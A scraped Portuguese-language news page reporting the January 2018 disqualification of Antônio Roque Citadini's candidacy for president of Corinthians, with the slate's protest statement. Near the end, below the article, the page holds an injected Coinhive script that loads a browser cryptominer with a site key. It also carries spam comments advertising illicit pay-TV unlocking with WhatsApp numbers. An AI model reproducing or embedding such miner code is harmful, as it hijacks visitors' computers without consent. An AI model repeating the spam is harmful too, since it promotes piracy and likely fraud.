16/1/2018 13:07

Conselho impugna candidatura de Citadini à presidência do Corinthians

Guilherme Strenger acata recomendação de comissão eleitoral, e candidato fica inelegível. Ele promete recorrer

Conselho impugna candidatura de Citadini à presidência do Corinthians
Foto: Marcelo Braga

O Conselho Deliberativo do Corinthians impugnou a candidatura de Antônio Roque Citadini à presidência do clube. A decisão foi assinada por Guilherme Strenger, presidente do Conselho, na noite desta segunda-feira.



Dessa forma, Citadini foi declarado inelegível e não poderá participar da eleição do dia 3 de fevereiro.

Em dezembro, um sócio protocolou o pedido da saída de Citadini com o argumento de que ele faz parte do Tribunal de Contas do Estado, o que o impediria de concorrer a cargos administrativos no clube. Citadini alegou que há jurisprudência a seu favor e que esta é uma questão a ser discutida no Tribunal, não no Corinthians.

Além de Citadini, outros candidatos podem ser impedido de concorrer: Paulo Garcia foi notificado a apresentar defesa sobre o pedido de impugnação contra ele. Recentemente, Garcia admitiu ter feito pagamentos para regularizar sócios em troca de votos. Andrés Sanchez é investigado pelo mesmo motivo.

Também chegou à comissão pedido para investigação do candidato Felipe Ezabella, sob alegação de que ele é advogado e procurador do jogador Elias, tendo supostamente participado das negociações de sua chegada e saída do Corinthians, enquanto ocupava o cargo de conselheiro do clube. Outra acusação é de que Ezabella se elegeu para o Conselho em 2007 sem ter condições estatutárias para tal, já que ainda não havia completado cinco anos como sócio.

O clube, porém, ainda não tem apuração com relação a esse caso, já que não houve solicitação formal de diligência, apenas "comentários", segundo Miguel Marques. Ezabella nega ter participado da transferência de Elias e afirma que o estatuto em 2007 não determinava tempo mínimo para candidaturas de sócios remidos (como era seu caso).

Além de Garcia, Sanchez e Ezabella, concorre à presidência o candidato Romeu Tuma Júnior.

Em nota, a chapa encabeçada por Citadini promete recorrer. Leia abaixo:

"A Chapa Corinthians Mais Forte, formada pelo candidato a Presidente Antonio Roque Citadini, e pelos candidatos a Vice-presidentes Osmar Stábile e Augusto Melo, repudia a decisão do Presidente do Conselho Deliberativo, Guilherme Strenger, após parecer da Comissão Eleitoral, por considerá-la equivocada.

O candidato Antonio Roque Citadini, como amplamente demonstrado em sua peça de defesa, preenche todos os requisitos estatutários e legais para ser candidato.

Além de não ter fundamento, a acusação deveria ter sido recusada porque a comissão eleitoral deveria se ater a analisar os requisitos pertinentes a candidatura, que estão prescritos apenas no Estatuto.

Cumpre destacar que o Excelentíssimo Desembargador Strenger foi o presidente da Comissão Eleitoral nas últimas eleições do Corinthians, em 2015. Naquela eleição, Citadini também foi candidato e, estando em situação estatutária e legal idêntica à deste pleito, nada lhe foi objetado.

A decisão de hoje também coloca sob suspeição a legitimidade do Doutor Strenger como Presidente do Conselho Deliberativo, uma vez que ela se baseia em decisão do Conselho Nacional de Justiça aplicada às eleições do Santa Cruz de 2009. Naquela oportunidade, foi determinado que um magistrado tampouco poderia ser Pesidente do Conselho Deliberativo.

Por todo o exposto, a Chapa Corinthians Mais Forte está determinada a que seja respeitado o seu direito e irá recorrer a todas as instâncias estatutárias e judiciais pertinentes para que a candidatura democraticamente apresentada, seja respeitada.

Finalmente, a Chapa Corinthians Mais Forte, ciente de que está à frente nas pesquisas, convoca suas chapas aliadas e seus eleitores a manter e aumentar a mobilização com vistas à eleição do dia 3 de fevereiro".


VEJA TAMBÉM
- Timão escalado para o jogo contra o Juventude
- Corinthians e Atlético-MG empatam na estreia do Brasileirão
- Timão escalado para o jogo contra o Atlético-MG









6024 visitas - Fonte: Globoesporte.com

Mais notícias do Corinthians

Notícias de contratações do Timão
Notícias mais lidas

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.

Últimas notícias

  • publicidade
  • publicidade
    publicidade

    Brasileiro

    Dom - 16:00 - Neo Química Arena -
    X
    Corinthians
    Atletico-MG

    Sudamericana

    Ter - 19:00 - Neo Química Arena
    4 X 0
    Corinthians
    Nacional Asuncion
    publicidade
    publicidade
    publicidade